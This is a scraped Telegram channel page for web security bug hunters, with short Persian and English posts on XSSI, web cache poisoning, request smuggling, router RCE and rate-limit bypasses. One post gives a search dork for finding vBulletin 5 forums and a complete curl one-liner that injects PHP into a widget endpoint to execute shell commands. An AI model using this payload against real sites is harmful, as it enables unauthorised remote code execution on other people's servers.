Web_Priv8
762 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
Forwarded from digMeMore (r00t98)
This media is not supported in your browser
VIEW IN TELEGRAM
Google Account XSSI

آسیب پذیری XSSI جایی رخ میده که یکسری اطلاعات حساس داخل فایل های جاوااسکریپت قرار میگیره و از اونجایی که SOP واس src کردن فایل های جاوااسکریپت محدودیت نداره اجازه میده که فایل src شه و اطلاعات کاربر خونده شه.

#XSSI
#BugBounty

@digmemore
Web Cache Entanglement: Novel Pathways to Poisoning

https://portswigger.net/research/web-cache-entanglement

#WCP

@web_priv8
HTTP Request Smuggling in 2020

#Smuggling
#Book

@web_priv8
آسیب پذیری RCE بر روی روترهای مبین نت

بخش انگلیسی:
https://link.medium.com/2QQKzATVM8

بخش فارسی:
https://vrgl.ir/3gZtC


#RCE

@web_priv8
0day RCE exploit on vBulletin 5xx

dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#vbulletin
#rce
#pentest
#web

@sec_nerd
راهکارهایی برای دور زدن Rate Limit



#bugbounty
#pentest


@sec_nerd